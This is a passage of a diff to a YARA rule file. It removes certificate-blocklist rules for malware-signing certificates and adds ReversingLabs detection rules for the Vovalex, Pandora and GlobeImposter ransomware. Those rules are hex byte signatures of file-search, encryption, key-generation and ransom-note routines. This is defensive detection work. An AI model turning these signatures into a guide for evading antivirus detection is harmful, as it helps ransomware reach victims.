?? 28 ?? ?? ?? ?? 26 72 ?? ?? ?? ?? + 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 16 15 28 ?? ?? ?? ?? 26 00 00 28 ?? ?? ?? ?? 28 ?? ?? + ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 16 FE ?? 0B 07 39 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 + ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE ?? 0C 08 2C ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? + ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? + ?? ?? ?? 28 ?? ?? ?? ?? 00 00 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? + ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 00 DE ?? 25 + 28 ?? ?? ?? ?? 0D 00 28 ?? ?? ?? ?? DE ?? 00 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 17 28 ?? ?? ?? ?? + 00 02 18 28 ?? ?? ?? ?? 00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? + 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 59 + } + $main_ransomware_function_p2 = { + 28 ?? ?? ?? ?? B7 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? + ?? 5B 28 ?? ?? ?? ?? B7 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? + ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6C 23 + ?? ?? ?? ?? ?? ?? ?? ?? 5B 59 28 ?? ?? ?? ?? B7 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? + ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 23 ?? ?? ?? ?? ?? ?? ?? ?? 5A 28 ?? ?? ?? ?? B7 73 ?? ?? ?? ?? 6F + ?? ?? ?? ?? 00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ?? + ?? ?? ?? ?? ?? ?? 5B 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 59 28 ?? ?? ?? + ?? B7 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F ?? DA 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? + 00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? + ?? ?? 5B 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 59 28 ?? ?? ?? ?? B7 28 ?? + ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 23 ?? ?? ?? ?? ?? + ?? ?? ?? 5A 28 ?? ?? ?? ?? B7 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F + } + $search_files = { + 00 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 38 ?? ?? ?? ?? 06 6F ?? ?? ?? + ?? 0B 07 07 6F ?? ?? ?? ?? 17 DA 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 16 FE + ?? 0C 08 2C ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE ?? 0D 09 2C ?? 00 02 07 07 72 ?? + ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 07 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? + ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 16 14 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? DE ?? 00 00 00 00 00 00 06 6F + ?? ?? ?? ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? 00 DC DE ?? 25 28 ?? ?? ?? ?? + 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 03 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? + 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 11 ?? 6F ?? + ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 17 DA 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? + ?? ?? ?? 16 FE ?? 13 ?? 11 ?? 2C ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE ?? 13 ?? + 11 ?? 2C ?? 00 02 11 ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 11 ?? + 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 16 14 28 ?? ?? ?? ?? 26 28 ?? + ?? ?? ?? DE ?? 00 00 00 00 00 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 + ?? 6F ?? ?? ?? ?? 00 DC DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 11 ?? 17 D6 13 ?? + 11 ?? 11 ?? 8E 69 FE ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? 2A + } + $encrypt_files = { + 00 00 03 19 17 73 ?? ?? ?? ?? 0A 04 18 18 73 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 08 28 ?? ?? ?? ?? 05 6F + ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 08 28 ?? ?? ?? ?? 05 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? + 0D 07 09 17 73 ?? ?? ?? ?? 13 ?? 06 6F ?? ?? ?? ?? 17 6A DA B7 17 D6 8D ?? ?? ?? ?? 13 ?? 06 11 ?? 16 + 11 ?? 8E 69 6F ?? ?? ?? ?? 26 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 07 + 6F ?? ?? ?? ?? 00 06 6F ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 2A + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Fortuna Games Co., Ltd." and pe.signatures[i].serial=="02:8e:1d:ec:cf:93:d3:8e:cf:39:61:18:df:e9:08:b4" and 1392163199<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and (( all of ($main_ransomware_function_p*)) and $search_files and $encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_40575Df73Eaa1B6140C7Ef62C08Bf216 : INFO FILE +rule REVERSINGLABS_Win64_Ransomware_Vovalex : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Vovalex ransomware." author = "ReversingLabs" - id = "6a6e6320-8e01-5ec7-8119-3e90f1eacc4e" - date = "2023-11-08" - modified = "2023-11-08" + id = "dd4d7969-1afc-5e5d-9324-89f432523173" + date = "2021-03-12" + modified = "2021-03-12" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L243-L259" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7da8e98f38413e5cbb18e3c7771c530afb766dd9fbeb8fdd2264617aff24f920" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win64.Ransomware.Vovalex.yara#L1-L81" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0c0f065224988bcba45b5aba2dceb080479b0bab235d544daabc3cae72e48318" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Vovalex" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files = { + 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B BD ?? ?? ?? ?? + 48 89 BD ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 + 89 85 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 + 8B 9D ?? ?? ?? ?? 48 8B 53 ?? 48 8B 03 48 89 85 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 + 8D 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 83 F8 ?? 75 ?? 48 8B B5 ?? + ?? ?? ?? 48 8B 56 ?? 48 8B 06 48 89 85 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 8D 95 ?? + ?? ?? ?? 8B 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 8B 9D ?? ?? ?? + ?? 48 8B 53 ?? 48 8B 03 48 89 85 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? + ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 48 83 + EC ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 9D ?? ?? ?? ?? 48 89 9D ?? ?? + ?? ?? 48 8D B5 ?? ?? ?? ?? 56 48 89 85 ?? ?? ?? ?? 48 89 9D ?? ?? ?? ?? 48 8D 15 ?? + ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? + 48 89 8D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 9D ?? ?? ?? ?? + 48 89 9D ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 0D + ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 85 ?? ?? ?? ?? 48 89 95 ?? + ?? ?? ?? 4C 8D 8D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 1D ?? + ?? ?? ?? 48 89 9D ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 89 8D ?? + ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? + ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 + } + $find_files_p1 = { + 48 89 C6 48 8D 0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 C1 48 83 + EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 06 48 89 56 ?? 48 8D 0D ?? ?? ?? ?? 48 83 EC + ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 C1 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 + 46 ?? 48 89 56 ?? 48 8D 0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 + C1 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 46 ?? 48 89 56 ?? 48 8D 0D ?? ?? ?? + ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 C1 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 + C4 ?? 48 89 46 ?? 48 89 56 ?? 48 8D 0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 + C4 ?? 48 89 C1 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 46 ?? 48 89 56 ?? 48 8D + 0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 C1 48 83 EC ?? E8 ?? ?? + ?? ?? 48 83 C4 ?? 48 89 46 ?? 48 89 56 ?? 48 89 B5 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? + ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 89 95 ?? ?? + ?? ?? BA ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 + } + $find_files_p2 = { + 89 C3 48 8B 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 03 48 89 53 ?? 48 8D 15 ?? ?? + ?? ?? BF ?? ?? ?? ?? 48 89 7B ?? 48 89 53 ?? 48 8D 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 + 89 43 ?? 48 89 4B ?? 48 89 9D ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 45 31 C0 + 4C 89 85 ?? ?? ?? ?? 4C 8D A5 ?? ?? ?? ?? 49 C7 04 24 ?? ?? ?? ?? 49 8B 14 24 48 89 + 95 ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? 4C 8D AD ?? ?? ?? ?? 49 B9 ?? ?? ?? ?? ?? ?? ?? + ?? 4D 89 4D ?? 49 8B 4D ?? 48 89 8D ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? 4C 8D B5 ?? ?? + ?? ?? 4D 89 06 49 8B 16 48 8D 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? + 45 31 C0 41 3B C0 7E ?? 41 BF ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? 4C 8D 8D ?? ?? ?? ?? + 4D 69 D7 ?? ?? ?? ?? 4D 89 11 4C 89 D2 48 8D 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? + ?? 48 83 C4 ?? 45 31 C0 41 3B C0 79 ?? 4C 89 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 + C7 01 ?? ?? ?? ?? 48 8B 01 48 89 85 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 8D 8D ?? ?? + ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 85 C0 7E ?? 48 8B 9D ?? ?? ?? ?? 48 B8 + ?? ?? ?? ?? ?? ?? ?? ?? 48 F7 EB + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Dali Feifang Tech Co.,LTD." and pe.signatures[i].serial=="40:57:5d:f7:3e:aa:1b:61:40:c7:ef:62:c0:8b:f2:16" and 1394063999<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_049Ce8C47F1F0E650Cb086F0Cfa7Ca53 : INFO FILE +rule REVERSINGLABS_Win64_Ransomware_Pandora : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Pandora ransomware." author = "ReversingLabs" - id = "aebba591-2024-584a-bba6-9a27049cf4b8" - date = "2023-11-08" - modified = "2023-11-08" + id = "18182bbe-1678-5d0b-a7ee-80c4bbaee99e" + date = "2022-06-01" + modified = "2022-06-01" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L261-L277" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "9ae4a236e1252afc1db6fae4e388a53ebde7e724cc07c213d4bfc176cf0a0096" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win64.Ransomware.Pandora.yara#L1-L95" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6576bde36ae9a9bc2e9dd878db788c608083b84d96d31e6898f48a264c6b7f1a" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Pandora" + tc_detection_factor = 5 importance = 25 + strings: + $find_files_p1 = { + 41 57 41 56 41 55 41 54 56 57 55 53 48 83 EC ?? 48 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? + ?? 45 31 F6 41 BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? + ?? 48 89 4C 24 ?? 45 31 C0 41 81 FA ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 0F + 4C CA 41 0F 94 C0 48 8B 8C 08 ?? ?? ?? ?? 48 01 F1 31 D2 31 DB 41 81 FA ?? ?? ?? ?? + 0F 9C C2 0F 95 C3 41 BD ?? ?? ?? ?? 49 29 D5 41 81 FA ?? ?? ?? ?? BF ?? ?? ?? ?? BA + ?? ?? ?? ?? 48 0F 4C FA 4C 8D 4C 9B ?? 41 BB ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 0F 44 DA + 49 83 C8 ?? 31 DB 31 D2 41 81 FA ?? ?? ?? ?? 0F 9C C3 4C 8D 64 1B ?? 0F 94 C2 48 83 + F2 ?? 31 DB 41 81 FA ?? ?? ?? ?? 0F 94 C3 48 8D 1C DB 48 83 C3 ?? EB ?? 0F 1F 40 ?? + 4A 8B AC C0 ?? ?? ?? ?? 48 01 F5 FF E5 FF E1 4A 8B AC E0 ?? ?? ?? ?? 48 01 F5 FF E5 + 48 8B AC D8 ?? ?? ?? ?? 48 01 F5 FF E5 0F 1F 80 ?? ?? ?? ?? 48 8B AC F8 ?? ?? ?? ?? + 48 01 F5 FF E5 4A 8B AC E8 ?? ?? ?? ?? 48 01 F5 FF E5 4A 8B AC D8 ?? ?? ?? ?? 48 01 + } + $find_files_p2 = { + F5 FF E5 66 0F 1F 84 00 ?? ?? 00 00 48 8B AC D0 ?? ?? ?? ?? 48 01 F5 FF E5 4A 8B AC + C8 ?? ?? ?? ?? 48 01 F5 FF E5 44 89 74 24 ?? 48 63 4C 24 ?? 48 8B 54 24 ?? 48 8B 8C + CA ?? ?? ?? ?? 48 89 4C 24 ?? 48 8B 4C 24 ?? 8B 54 24 ?? BD ?? ?? ?? ?? 01 EA 44 8B + 54 24 ?? BD ?? ?? ?? ?? 41 01 EA 66 83 39 ?? 44 0F 45 D2 E9 ?? ?? ?? ?? 45 31 FF EB + ?? 66 2E 0F 1F 84 00 ?? ?? 00 00 90 41 BF ?? ?? ?? ?? 44 8B 54 24 ?? 41 81 C2 ?? ?? + ?? ?? E9 ?? ?? ?? ?? 66 0F 1F 84 00 ?? ?? 00 00 44 8B 74 24 ?? 41 83 C6 ?? 48 8B 54 + 24 ?? 48 8B 05 ?? ?? ?? ?? 48 8B 80 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 01 C8 48 8B 4C 24 + ?? FF D0 8B 4C 24 ?? BA ?? ?? ?? ?? 01 D1 44 8B 54 24 ?? BA ?? ?? ?? ?? 41 01 D2 85 + C0 44 0F 44 D1 E9 ?? ?? ?? ?? 44 89 F8 48 83 C4 ?? 5B 5D 5F 5E 41 5C 41 5D 41 5E 41 + 5F C3 + } + $generate_key = { + 41 57 41 56 41 55 41 54 56 57 55 53 48 81 EC ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 + 8D B4 24 ?? ?? ?? ?? 48 89 74 24 ?? 48 8B 44 24 ?? 48 8B 05 ?? ?? ?? ?? 48 C7 C5 ?? + ?? ?? ?? 48 8B 80 ?? ?? ?? ?? 48 01 E8 41 BC ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 4C 01 + E1 BA ?? ?? ?? ?? 48 03 15 ?? ?? ?? ?? FF D0 48 8B 05 ?? ?? ?? ?? 48 8B 4C 24 ?? 0F + B7 90 ?? ?? ?? ?? 66 89 51 ?? 48 8B 80 ?? ?? ?? ?? 48 89 01 48 8B 05 ?? ?? ?? ?? 48 + 8B 80 ?? ?? ?? ?? 48 01 E8 48 8B 0D ?? ?? ?? ?? 4C 01 E1 FF D0 48 8B 05 ?? ?? ?? ?? + 48 8B 80 ?? ?? ?? ?? 48 01 E8 48 8B 0D ?? ?? ?? ?? 4C 01 E1 FF D0 48 8B 05 ?? ?? ?? + ?? 48 8B 80 ?? ?? ?? ?? 48 01 E8 48 89 F1 FF D0 48 98 4C 8B 05 ?? ?? ?? ?? 4D 01 E0 + 48 8B 0D ?? ?? ?? ?? 48 8B 99 ?? ?? ?? ?? 48 01 EB 48 8B 0D ?? ?? ?? ?? 4C 01 E1 48 + 89 44 24 ?? 48 8D 15 ?? ?? ?? ?? 49 89 F1 FF D3 89 84 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? + 45 31 ED 41 BE ?? ?? ?? ?? 41 BF ?? ?? ?? ?? BB ?? ?? ?? ?? EB ?? 81 F9 ?? ?? ?? ?? + BA ?? ?? ?? ?? BF ?? ?? ?? ?? 48 0F 44 D7 48 8B 04 10 4C 01 F0 FF E0 + } + $drop_ransom_note = { + 48 8B 05 ?? ?? ?? ?? 48 8B 80 ?? ?? ?? ?? BD ?? ?? ?? ?? 48 01 E8 48 8B 0D ?? ?? ?? + ?? BE ?? ?? ?? ?? 48 01 F1 48 8B 15 ?? ?? ?? ?? BF ?? ?? ?? ?? 48 01 FA FF D0 48 8B + 0D ?? ?? ?? ?? 48 01 F1 48 8B 05 ?? ?? ?? ?? 48 8B 90 ?? ?? ?? ?? 48 01 EA FF D2 48 + 8B 15 ?? ?? ?? ?? 48 01 F2 48 8B 8C 24 ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 48 8B B6 ?? + ?? ?? ?? 48 01 EE 48 C7 44 24 ?? ?? ?? ?? ?? 41 89 C0 4C 8D 4C 24 ?? FF D6 BE ?? ?? + ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 90 ?? ?? ?? ?? 41 BE ?? ?? + ?? ?? 48 01 EA FF D2 BF ?? ?? ?? ?? 8B 4C 24 ?? B8 ?? ?? ?? ?? 01 C1 E9 ?? ?? ?? ?? + 81 F9 ?? ?? ?? ?? BA ?? ?? ?? ?? BD ?? ?? ?? ?? 48 0F 44 D5 48 8B 04 10 4C 01 E0 FF + E0 8B 44 24 ?? 83 C0 ?? 89 44 24 ?? 8B 4C 24 ?? B8 ?? ?? ?? ?? 01 C1 E9 ?? ?? ?? ?? + 81 F9 ?? ?? ?? ?? BA ?? ?? ?? ?? BD ?? ?? ?? ?? 48 0F 44 D5 48 8B 04 10 4C 01 E0 FF + E0 8B 4C 24 ?? B8 ?? ?? ?? ?? 01 C1 E9 ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? BA ?? ?? ?? ?? + BD ?? ?? ?? ?? 48 0F 44 D5 48 8B 04 10 4C 01 E0 FF E0 8B 4C 24 ?? B8 ?? ?? ?? ?? 01 + C1 C7 44 24 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? BA ?? ?? ?? ?? BD ?? ?? + ?? ?? 48 0F 44 D5 48 8B 04 10 4C 01 E0 FF E0 48 8B 05 ?? ?? ?? ?? 48 8B 88 ?? ?? ?? + ?? 48 8B 05 ?? ?? ?? ?? 48 8B 80 ?? ?? ?? ?? 4C 01 F0 C7 44 24 ?? ?? ?? ?? ?? 48 8D + 54 24 ?? 4C 8D 84 24 ?? ?? ?? ?? 4C 8D 4C 24 ?? FF D0 BF ?? ?? ?? ?? 8B 54 24 ?? B9 + ?? ?? ?? ?? 01 CA 8B 4C 24 ?? BD ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? + 48 8B 84 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 31 C0 48 81 + C4 ?? ?? ?? ?? 5B 5D 5F 5E 41 5C 41 5D 41 5E 41 5F C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Select'Assistance Pro" and pe.signatures[i].serial=="04:9c:e8:c4:7f:1f:0e:65:0c:b0:86:f0:cf:a7:ca:53" and 1393804799<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($generate_key) and ($drop_ransom_note) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_29F42680E653Cf8Fafd0E935553F7E86 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Globeimposter : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects GlobeImposter ransomware." author = "ReversingLabs" - id = "f616e92c-ed9f-581c-aa15-970bddfb073a" - date = "2023-11-08" - modified = "2023-11-08" + id = "6634a554-b4bb-503d-a4f1-9997b4caa1f0" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L279-L295" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6c726e4c2933a6472d256a18ea5265660ff035d05036ab9cae3409ab5a7c7598" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.GlobeImposter.yara#L1-L171" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4345a767f270428f3b509fdad5a96bf9b494b190d3a836c4bf53dfd75da5bacb" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "GlobeImposter" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_1 = { + 81 EC ?? ?? ?? ?? 83 24 24 ?? 6A ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 44 24 + ?? 50 E8 ?? ?? ?? ?? 8D 04 24 50 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 8B 1D ?? + ?? ?? ?? 55 56 57 8B 3D ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? 50 E8 ?? ?? + ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 8D 84 24 ?? ?? ?? ?? 68 ?? ?? + ?? 